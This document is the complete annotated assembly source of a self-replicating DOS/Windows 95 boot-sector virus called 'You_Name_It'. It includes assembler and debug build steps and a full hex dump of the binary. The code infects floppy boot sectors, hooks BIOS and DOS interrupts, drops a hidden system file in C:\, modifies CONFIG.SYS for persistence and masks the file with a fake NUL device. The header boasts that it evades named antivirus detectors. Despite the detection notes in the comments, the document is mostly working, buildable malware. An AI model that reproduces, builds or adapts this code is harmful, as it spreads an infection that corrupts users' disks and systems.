comment *
Designed by "Q" the Misanthrope
The "You_Name_It" virus needed to be made. Windows 95 has neglected the
floppy boot sector virus long enough. Windows 95 in its 32 bit protected
mode has its own floppy disk routines and doesn't use int 13 or int 40
anymore. When a floppy boot sector virus infects the hard disk of the
Windows 95 computer, it would flag a change in the MBR or DBR indicating
a possible virus attack (not good). The conclusion, don't hook int 13, hook
int 21. Problem is, when Windows 95 starts up, it starts in DOS mode then
changes to its protected mode DOS so int 21 hooked in DOS mode isn't hooked
anymore. Many of the multipartite virii will not infect once Windows 95
starts. If your boot sector virus can infect a program called in your
AUTOEXEC.BAT or your CONFIG.SYS then the virus would go resident. The
"You_Name_it" virus does this. It creates a randomly named file and adds
INSTALLHIGH=C:\AKYT.SQW (name is random) to the CONFIG.SYS file. Now when
Windows 95's int 21 is called to change the default drive to A: then the
infection occurs. Also to armor the virus a NUL device by the same name as
the virus is created so any reads, writes or deletes of the virus will go
into NUL-Space. Also the boot sector infection will not attack the CONFIG.SYS
multiple times.
P.S. This virus will not be detected by Thunderbytes TBRESCUE Boot sector
detector or CMOS virus protection.
tasm unameit /m2
tlink unameit
exe2bin unameit.exe unameit.com
format a:/q/u
debug unameit.com
l 300 0 0 1
w 100 0 0 1
w 300 0 20 1
m 13e,2ff 100
rcx
1c2
w
q
unameit
*
;-----------------------------------------------------------------------
; Image layout.  This one segment is used as two different images:
;   (a) a 512-byte floppy boot sector: jmp + BPB at 0, code from 3Eh,
;       55AAh signature at 1FEh;
;   (b) a .COM file that starts at com_install and is loaded at 0100h.
; Every absolute address in the code is therefore written against one of
; three bases:
;   +7c00h              first in-memory copy (boot origin / video-RAM copy)
;   +7e00h-02h          second in-memory copy, 1FEh bytes after the first
;   -com_install+0100h  the .COM / TSR image
; TASM, 16-bit real mode, Intel syntax, 80286 instruction set (pusha/popa).
;-----------------------------------------------------------------------
.286
qseg segment byte public 'CODE'
assume cs:qseg,es:qseg,ss:nothing,ds:qseg
top: jmp short jmp_install ;boot sector data
db 90h
; BIOS parameter block of a standard 1.44 MB floppy.  It is only used by
; the image that tasm builds: when an existing floppy is infected
; (resident_21) the victim's own BPB stays in place and only bytes 0-1
; and 3Eh-1FDh of the sector are replaced.
db 'MSDOS5.0' ;OEM name
dw 512 ;bytes per sector
db 1 ;sectors per cluster
dw 1 ;reserved sectors
db 2 ;number of FATs
dw 224 ;root directory entries
dw 2880 ;total sectors
db 0F0h ;media descriptor
dw 9 ;sectors per FAT
dw 18 ;sectors per track
dw 2 ;heads
org 003eh ;code starts right after the BPB
;-----------------------------------------------------------------------
; com_install - first byte of the dropped .COM file (loaded at 0100h).
; interrupt_21 writes the image starting here, so offset 3Eh of the
; sector becomes offset 0100h of the file; hence the -com_install+0100h
; addressing used by go_mem_res and resident_21.
;-----------------------------------------------------------------------
com_install proc near
jmp short go_mem_res ;.COM entry: go resident via CONFIG.SYS path
com_install endp
;-----------------------------------------------------------------------
; jmp_install - boot-sector entry point (reached from top: at boot).
; Copies the 1FEh-byte sector image twice, either into text video RAM
; (B800h:7c00h and B800h:7dfeh) or, on a monochrome adapter, to
; 7c00h:7c00h/7dfeh; continues executing from the copy; hooks int 1ah to
; interrupt_1a in the second copy unless the marker word is already found
; at the video-RAM address; then falls through into set_cx_dx, which reads
; the original boot sector back from the last root-directory sector and
; retf's to it at 0000:7c00.
; In:   cs:ip assumed 0000:7c00 (BIOS boot); ds/es/bx undefined
; Uses: si/di/cx for the copies, bx = 7c00h; bp/cx/dh set by set_cx_dx
; Detection notes: marker word 7c00h at offset id-top of the sector;
; int 1ah vector pointing into segment B800h (or 7c00h) after boot.
;-----------------------------------------------------------------------
jmp_install proc near ;floppy boot up
push cs ;cs (assumed 0000) for the final retf to 0000:7c00
id equ $+1 ;address of the 7c00h immediate below = the marker word
mov si,7c00h ;si = 7c00h, also the infection marker
lea bx,word ptr ds:[si] ;bx=7c00 (lea leaves flags alone)
push bx ;ip (7c00) for the final retf to 0000:7c00
cld
push cs
mov es,bx ;es=7c00h: destination used on a monochrome adapter
pop ds ;ds=cs so ds:[0449h] is the BIOS video-mode byte
cmp word ptr ds:[0449h],07h ;mode 7 = monochrome text adapter
je monochrome
push 0b800h ;colour text adapter: park the code at the top of the
pop es ;B800h range, which the author treats as free
cmp word ptr es:[si+id-top],si ;marker already at B800:7c00+(id-top)?  sets ZF
monochrome: push es ;destination segment; popped as CS by return_far
mov di,si ;di=7c00
mov cx,offset previous_hook ;cx = 1FEh bytes: the image up to the far jmp
push cx ;count and source are needed twice because the
push si ;image is copied to es:7c00 and then es:7dfe
rep movsb ;first copy -> es:7c00 (rep movsb does not touch flags)
pop si
pop cx
call return_far ;near call + retf: resume in the copy at es:(next line)
rep movsb ;second copy -> es:7dfe (di continues from the first)
mov si,1ah*04h ;ds:si = int 1ah vector (ds is still the boot segment)
je already_res ;ZF is still the marker compare: if resident, don't
movsw ;hook again.  Otherwise save the old int 1ah vector
movsw ;into the second copy's previous_hook (es:7ffc)
mov word ptr ds:[si-02h],cs ;and point int 1ah at interrupt_1a
mov word ptr ds:[si-04h],offset interrupt_1a+7e00h-02h ;in the second copy
already_res: push ds ;es = boot segment: set_cx_dx reads the original
pop es ;boot sector back to es:7c00
re_get_boot: mov ax,0201h ;BIOS read 1 sector; falls into set_cx_dx
jmp_install endp
;-----------------------------------------------------------------------
; set_cx_dx - compute the CHS address of the last root-directory sector
; from a boot sector's BPB and issue int 13h there.
; In:   ds:bx -> boot sector with BPB (bx = 7c00h at boot, vbuffer in the
;       TSR); ax = 0201h (read) or 0301h (write); es:bx = buffer;
;       dl = drive (0 in both callers)
; Out:  int 13h result; cx/dh = CHS; bp clobbered
; Ends in retf: at boot this pops the 0000:7c00 pushed by jmp_install and
; runs the original boot sector; from resident_21 it pops the cs:ip that
; resident_21 pushed, so it serves as both fall-through and subroutine.
; Math: root sectors = entries*32/512 = entries >> 4; 1-based sector =
; 1 reserved + 2*FAT + root; minus one track => cylinder 0, head 1.
; Hard-codes 2 FATs, 1 reserved sector and a result inside cylinder 0
; (true for the standard 1.44 MB layout: 1+18+14-18 = sector 15, head 1).
; Detection note: that sector of an infected floppy holds a boot sector
; image (55AAh at 1FEh) where root-directory entries should be.
;-----------------------------------------------------------------------
set_cx_dx proc near
mov bp,word ptr ds:[bx+11h] ;bp = root directory entries (BPB)
mov cx,word ptr ds:[bx+16h] ;cx = sectors per FAT (BPB)
shr bp,04h ;bp = root directory sectors (entries*32/512)
shl cx,01h ;cx = sectors of both FATs
add cx,bp ;cx = FATs + root directory
inc cx ;+1 reserved (boot) sector
mov dh,01h ;head 1
sub cx,word ptr ds:[bx+18h] ;minus one track => sector number on head 1
int 13h ;read or write that sector (ax chosen by caller)
return_far: retf ;return to 0000:7c00 or into resident_21
set_cx_dx endp ;(also the call target jmp_install uses to switch segment)
; Strings used by interrupt_21.  file_name is 'C:\' plus a NUL; DOS
; (int 21h/5Ah) appends the generated name at file_name+3, and the code
; then forces '.' into the 5th character (dot) and stores CR LF after the
; 8th (crlf), giving "INSTALLHIGH=C:\xxxx.yyy" CR LF for CONFIG.SYS.
config_line db "C:\CONFIG.SYS",00 ;file to infect
install_name db 'INSTALLHIGH=' ;line prefix added to CONFIG.SYS
file_name db 'C:\' ;directory of the dropped .COM; the name is
db 00h ;filled in at run time by int 21h/5Ah
dot equ $+3 ;file_name+7: 5th char of the generated name -> '.'
crlf equ $+7 ;file_name+11: where the CR LF terminator is stored
;-----------------------------------------------------------------------
; go_mem_res - .COM entry (jumped to from com_install when the dropped
; file is started by INSTALLHIGH= in CONFIG.SYS).
; 1. On DOS >= 4: splices a fake character-device header at cs:0056h
;    into the driver chain right after the second device.  Attribute
;    8004h = character device + NUL bit; the name is the first 4 letters
;    of this program's name, taken from the MCB name field at cs-1:0008.
;    As the header comment of this file explains, the author relies on
;    DOS resolving that name to the device so the dropped file cannot be
;    read or deleted by name.
; 2. Frees the environment, saves the int 21h vector at previous_hook
;    (the operand of far_jmp), points int 21h at resident_21 and
;    terminates resident (ah=31h) keeping (tail-com_install+10fh)/16
;    paragraphs (4Dh; see the BA 4D 00 in the debug dump below).
; In:  cs=ds=es=PSP (.COM load)
; Note: the DOS<4 path relies on si already being 0Ch on entry so that
;       [si-0ch+2ch] addresses the PSP environment segment at 2Ch - TODO
;       confirm what the loader leaves in si.
; Detection notes: a device header in the chain whose name matches a file
; in C:\; an INSTALLHIGH=C:\xxxx.yyy line in CONFIG.SYS; a 4Dh-paragraph
; TSR owning int 21h.
;-----------------------------------------------------------------------
go_mem_res proc near ;CONFIG.SYS residency
mov ah,30h ;get DOS version (al = major)
int 21h
cmp al,04h ;the NUL device header moved in DOS 4.0,
jb below_dos4 ;so only build the fake device on DOS >= 4
mov ah,52h ;get list of lists -> es:bx
int 21h
cld
lds si,dword ptr es:[bx+22h];[bx+22h] = NUL device header; its first
push cs ;dword links to the second device: ds:si
pop es ;es = cs (PSP)
mov di,0060h-0ah ;fake header at cs:56h: next, attr, strat, intr, name
movsw ;copy the second device's "next" link into our header
movsw
mov word ptr ds:[si-02h],cs ;second device now links to cs:0056h
mov word ptr ds:[si-04h],0060h-0ah
mov ax,8004h ;attribute: character device (8000h) + NUL bit (0004h)
stosw ;[5Ah] attribute
stosw ;[5Ch] strategy entry (author: can be anything)
stosw ;[5Eh] interrupt entry (author: can be anything)
mov ax,cs ;cs-1 = this program's MCB; its name field is at
dec ax ;offset 8 (DOS 4+)
mov ds,ax
mov si,0008h
movsw ;4 letters of the file name -> device name at cs:60h;
movsw ;bytes 64h-67h are left as the PSP had them (author
below_dos4: push cs ;counts on the blank FCB's spaces there)
pop ds
mov es,word ptr ds:[si-0ch+2ch] ;es = PSP:[2Ch] = environment segment
mov ah,49h ;free the environment block
int 21h
mov ax,3521h ;get int 21h vector -> es:bx
int 21h
mov word ptr ds:[previous_hook-com_install+0100h],bx ;saved as the
mov word ptr ds:[previous_hook-com_install+0102h],es ;far_jmp operand
mov ax,2521h ;set int 21h to resident_21 (ds = cs)
mov dx,resident_21-com_install+0100h
int 21h
mov ah,31h ;terminate and stay resident
mov dx,((tail-com_install+010fh) SHR 4) ;paragraphs to keep: through tail
int 21h
go_mem_res endp
;-----------------------------------------------------------------------
; interrupt_21 - boot-time int 21h hook, installed by interrupt_1a once
; DOS is up.  Runs from the first copy (vector = interrupt_21+7c00h) but
; addresses its data in the second copy (+7e00h-02h).  interrupt_1a put
; the original int 21h vector into the int 18h slot, so every "int 18h"
; below is really a DOS call made without going through this hook.
; On any call except EXEC (ah=4Bh):
;   - opens C:\CONFIG.SYS; if the low byte of its file time is 0 the file
;     is treated as already infected and only closed
;   - otherwise creates a unique file in C:\ (int 21h/5Ah), closes and
;     deletes it, re-creates it with '.' forced into the 5th character of
;     the generated name (xxxx.yyy), attributes read-only+system, and
;     writes 205h (517) bytes of the image starting at com_install
;   - appends "INSTALLHIGH=C:\xxxx.yyy" CR LF to CONFIG.SYS and writes the
;     file time back with its low byte zeroed (the infection marker)
;   - restores the original int 21h vector from the first copy's
;     previous_hook, i.e. the hook is single-shot
; On EXEC it unhooks without infecting; if CONFIG.SYS cannot be opened it
; stays hooked and tries again on the next int 21h.
; Detection notes: CONFIG.SYS time field with low byte 0; a 517-byte
; read-only+system file in C:\ named by an INSTALLHIGH= line; int 18h
; vector equal to the DOS int 21h entry.
;-----------------------------------------------------------------------
interrupt_21 proc near ;hooked in after int 1a sees
pushf ;that dos loaded during boot
pusha
push ds
push cs
pop ds ;ds = cs (the video-RAM / 7c00h segment)
xor ah,4bh ;ah=4Bh (EXEC): a program is starting,
jz set_21_back ;unhook without infecting
mov ax,3d42h ;open C:\CONFIG.SYS read/write, deny-none
mov dx,offset config_line+7e00h-02h
int 18h ;really it is int 21 (vector copied there by interrupt_1a)
mov bx,5700h ;ax=5700h get file date/time, bx=handle
xchg ax,bx ;(xchg/mov keep CF from the open)
jc keep_trying ;open failed: stay hooked and retry on the next call
int 18h ;cx=time, dx=date
or cl,cl ;low time byte 0 = our marker: already infected
jz close_it
pusha ;save handle, date and time of CONFIG.SYS
mov ah,5ah ;create unique file in C:\ (cx=0 attributes)
sub cx,cx
mov dx,offset file_name+7e00h-02h ;DOS appends the name after 'C:\'
int 18h ;ax = temp handle
mov bh,3eh ;ax=3Exx close the temp handle
xchg ax,bx ;(bl still holds the CONFIG.SYS handle byte)
int 18h
mov ah,41h ;delete it: the generated name has no extension
int 18h
mov ax,5b2eh ;ah=5Bh create-new, al='.'
mov byte ptr ds:[dot+7e00h-02h],al ;force the xxxx.yyy form
mov cl,05h ;attributes read-only (01h) + system (04h)
int 18h ;ax = handle of the dropped file
mov dx,offset com_install+7c00h ;source: image in the first copy
mov bh,40h ;ah=40h write
xchg ax,bx ;bx = handle
mov ch,02h ;cx = 0205h bytes (cl is still 05h)
int 18h
mov ah,3eh ;close the dropped file
int 18h
popa ;ax=5700h, bx=handle, cx/dx = time/date of CONFIG.SYS
inc ax ;ax=5701h set file date/time
pusha ;keep them for the final set
mov ax,4202h ;seek to end of CONFIG.SYS
sub cx,cx
cwd ;dx = 0 (ax is positive)
int 18h
mov ah,40h ;write "INSTALLHIGH=C:\xxxx.yyy" CR LF
mov word ptr ds:[crlf+7e00h-02h],0a0dh ;CR LF after the 8-char name
mov cl,low(crlf-install_name+02h) ;19h bytes = 12 + 3 + 8 + 2
mov dx,offset install_name+7e00h-02h
int 18h
popa ;ax=5701h, bx=handle, cx=time, dx=date
xor cl,cl ;zero the low time byte: the infection marker
int 18h
close_it: mov ah,3eh ;close C:\CONFIG.SYS
int 18h
set_21_back: lds dx,dword ptr ds:[previous_hook+7c00h] ;original int 21h
mov ax,2521h ;put it back: this hook is single-shot
int 18h
keep_trying: jmp pop_ds_and_all ;restore registers, exit through far_jmp
interrupt_21 endp
;-----------------------------------------------------------------------
; resident_21 - TSR int 21h hook installed by go_mem_res (the dropped
; .COM).  Intercepts only ah=0Eh with dl=0 (select default drive A:):
;   - reads the A: boot sector into cs:vbuffer (int 13h ax=0201h, CHS
;     0/0/1); a read error leaves the disk alone
;   - if the byte at [id-top+1] is not 7Ch (high byte of the marker word)
;     the disk is clean: writes the clean sector to the last root-
;     directory sector (set_cx_dx, CHS from the victim's own BPB), copies
;     1C0h bytes of code over offsets 3Eh-1FDh of the buffer, patches
;     bytes 0-1 to "jmp short jmp_install" (EB 3E) and writes the buffer
;     back to sector 1.  The victim's BPB and 55AAh signature are kept.
; All other calls fall through to the original int 21h via far_jmp.
; Uses cs:vbuffer as scratch; all registers and ds/es restored at pop_it.
; Detection notes: A: boot sector with marker 7c00h at id-top and a boot
; sector image in its last root-directory sector.
;-----------------------------------------------------------------------
resident_21 proc near ;memory resident int 21
pushf ;called when loaded from
pusha ;config.sys
push ds
push es
cmp ah,0eh ;ah=0Eh select default drive?
jne not_setcurrent
or dl,dl ;dl=0 -> drive A:
jnz not_setcurrent
cwd ;dx=0: drive 0, head 0 (ah=0Eh so ax is positive)
mov bx,offset vbuffer-com_install+0100h ;es:bx = cs:vbuffer
push cs
mov cx,0001h ;cylinder 0, sector 1 = boot sector
pop es
push cs
mov ax,0201h ;BIOS read 1 sector
pop ds
int 13h
jc not_setcurrent ;read failed: don't infect
cmp byte ptr ds:[bx+id-top+01h],7ch ;high byte of the marker word present?
je not_setcurrent ;already infected
mov ax,0301h ;BIOS write 1 sector (used by both writes)
pusha ;keep ax/bx/cx/dx for the final write
push cs ;set_cx_dx ends in retf: push cs so it returns here
call set_cx_dx ;stash the clean boot sector in the last root dir sector
cld
mov cx,previous_hook-com_install ;1C0h bytes of code
mov si,0100h ;from the TSR image (com_install at 0100h)
lea di,word ptr ds:[bx+com_install-top] ;to buffer offset 3Eh, after BPB
rep movsb
mov word ptr ds:[bx],0000h ;patch bytes 0-1: the 0000h immediate is
org $-2 ;replaced at assembly time by the 2-byte
jmp $(jmp_install-top) ;"jmp short jmp_install" (EB 3E)
popa ;ax=0301h, cx=0001h, dx=0000h, bx=vbuffer
int 13h ;write the infected sector
not_setcurrent: jmp short pop_it ;restore and chain to the old int 21h
resident_21 endp
;-----------------------------------------------------------------------
; interrupt_1a - int 1ah (BIOS time-of-day) hook installed by jmp_install.
; Runs from the second copy (offset 1C3h + 7dfeh = 7fc1h, hence the org).
; On each int 1ah it asks the multiplexer (int 2fh ax=1200h) whether DOS
; is installed.  Once al returns 0FFh it:
;   - restores the original int 1ah vector from the second copy's
;     previous_hook (so this hook runs only once)
;   - copies the current int 21h vector into the int 18h slot (used as
;     "call DOS" by interrupt_21) and into the first copy's previous_hook
;   - points int 21h at interrupt_21 in the first copy
; Before and after that it exits through pop_it / far_jmp to the original
; int 1ah handler.  pop_it and pop_ds_and_all are the shared epilogue of
; all three hooks; each falls into far_jmp, whose operand is that copy's
; previous_hook.
; Detection notes: int 18h vector equal to the DOS int 21h entry; int 21h
; or int 1ah vectors pointing into B800h/7c00h during boot.
;-----------------------------------------------------------------------
org 001c3h ;fixed offset so interrupt_1a+7e00h-02h = 7fc1h
interrupt_1a proc near ;hooked at boot and waits for
pushf ;dos to load
pusha
mov ax,1200h ;int 2fh/1200h: DOS installation check
push ds
push es
cwd ;dx=0 (ax positive): segment of the IVT
int 2fh ;al=0FFh when DOS is installed
inc al ;-> ZF set when DOS is up
mov ds,dx ;ds=0000 (mov leaves ZF alone)
mov si,21h*04h ;ds:si = int 21h vector
mov di,offset previous_hook+7c00h ;di -> first copy's previous_hook
jnz pop_it ;DOS not loaded yet: just chain to the old int 1ah
les bx,dword ptr cs:[previous_hook+7e00h-02h] ;old int 1ah (2nd copy)
mov ds:[si-((21h-1ah)*04h)+2],es ;put it back in the int 1ah slot:
mov ds:[si-((21h-1ah)*04h)],bx ;this hook runs once
les bx,dword ptr ds:[si] ;es:bx = current (DOS) int 21h vector
mov ds:[si-((21h-18h)*04h)+2],es ;store it in the int 18h slot so
push cs ;interrupt_21 can reach DOS with "int 18h"
cld
mov ds:[si-((21h-18h)*04h)],bx
pop es ;es = cs
movsw ;also copy it into the first copy's previous_hook
movsw ;(the far_jmp operand interrupt_21 exits through)
mov word ptr ds:[si-04h],offset interrupt_21+7c00h ;hook int 21h
mov word ptr ds:[si-02h],cs ;-> interrupt_21 in the first copy
pop_it: pop es ;shared exit of all three hooks; falls
pop_ds_and_all: pop ds ;into far_jmp = jmp far [previous_hook]
popa
popf
interrupt_1a endp
;-----------------------------------------------------------------------
; far_jmp / previous_hook / boot_signature / vbuffer / tail.
; far_jmp is placed at 1FDh so that its 4-byte operand (previous_hook)
; starts at 1FEh and overlaps the 55AAh boot signature on disk.  In memory
; the operand is overwritten with a saved vector before the jmp is ever
; executed: the second copy gets the old int 1ah (jmp_install), the first
; copy the DOS int 21h (interrupt_1a), the TSR image the previous int 21h
; (go_mem_res).  vbuffer and tail exist only in the TSR image; they lie
; beyond the 512-byte sector.
;-----------------------------------------------------------------------
org 001fdh ;far_jmp ends exactly at 1FEh
far_jmp proc near
db 0eah ;opcode JMP FAR ptr16:16; operand = previous_hook
previous_hook: label double ;old int 1ah / boot-time int 21h / TSR int 21h
far_jmp endp
boot_signature dw 0aa55h ;55 AA at 1FEh: what makes the sector bootable
org $+0002h ;skip to 202h
vbuffer label byte ;512-byte scratch buffer used by resident_21
org $+0202h ;404h = end of the TSR image (see go_mem_res ah=31h)
tail label byte
qseg ends
end
comment *
debug script
nunameit.com
e0100 EB 74 0E BE 00 7C 8D 1C 53 FC 0E 8E C3 1F 83 3E
e0110 49 04 07 74 08 68 00 B8 07 26 39 74 42 06 8B FE
e0120 B9 FE 01 51 56 F3 A4 5E 59 E8 2B 00 F3 A4 BE 68
e0130 00 74 0A A5 A5 8C 4C FE C7 44 FC C1 7F 1E 07 B8
e0140 01 02 8B 6F 11 8B 4F 16 C1 ED 04 D1 E1 03 CD 41
e0150 B6 01 2B 4F 18 CD 13 CB 43 3A 5C 43 4F 4E 46 49
e0160 47 2E 53 59 53 00 49 4E 53 54 41 4C 4C 48 49 47
e0170 48 3D 43 3A 5C 00 B4 30 CD 21 3C 04 72 28 B4 52
e0180 CD 21 FC 26 C5 77 22 0E 07 BF 56 00 A5 A5 8C 4C
e0190 FE C7 44 FC 56 00 B8 04 80 AB AB AB 8C C8 48 8E
e01A0 D8 BE 08 00 A5 A5 0E 1F 8E 44 20 B4 49 CD 21 B8
e01B0 21 35 CD 21 89 1E C0 02 8C 06 C2 02 B8 21 25 BA
e01C0 42 02 CD 21 B4 31 BA 4D 00 CD 21 9C 60 1E 0E 1F
e01D0 80 F4 4B 74 62 B8 42 3D BA 94 7E CD 18 BB 00 57
e01E0 93 72 5D CD 18 0A C9 74 4A 60 B4 5A 2B C9 BA AE
e01F0 7E CD 18 B7 3E 93 CD 18 B4 41 CD 18 B8 2E 5B A2
e0200 B5 7E B1 05 CD 18 BA 3E 7C B7 40 93 B5 02 CD 18
e0210 B4 3E CD 18 61 40 60 B8 02 42 2B C9 99 CD 18 B4
e0220 40 C7 06 B9 7E 0D 0A B1 19 BA A2 7E CD 18 61 32
e0230 C9 CD 18 B4 3E CD 18 C5 16 FE 7D B8 21 25 CD 18
e0240 EB 7A 9C 60 1E 06 80 FC 0E 75 37 0A D2 75 33 99
e0250 BB C4 02 0E B9 01 00 07 0E B8 01 02 1F CD 13 72
e0260 21 80 7F 43 7C 74 1B B8 01 03 60 0E E8 D3 FE FC
e0270 B9 C0 01 BE 00 01 8D 7F 3E F3 A4 C7 07 EB 3E 61
e0280 CD 13 EB 37 00 9C 60 B8 00 12 1E 06 99 CD 2F FE
e0290 C0 8E DA BE 84 00 BF FE 7D 75 20 2E C4 1E FC 7F
e02A0 8C 44 E6 89 5C E4 C4 1C 8C 44 DE 0E FC 89 5C DC
e02B0 07 A5 A5 C7 44 FC 09 7D 8C 4C FE 07 1F 61 9D EA
e02C0 55 AA
rcx
1c2
w
q
*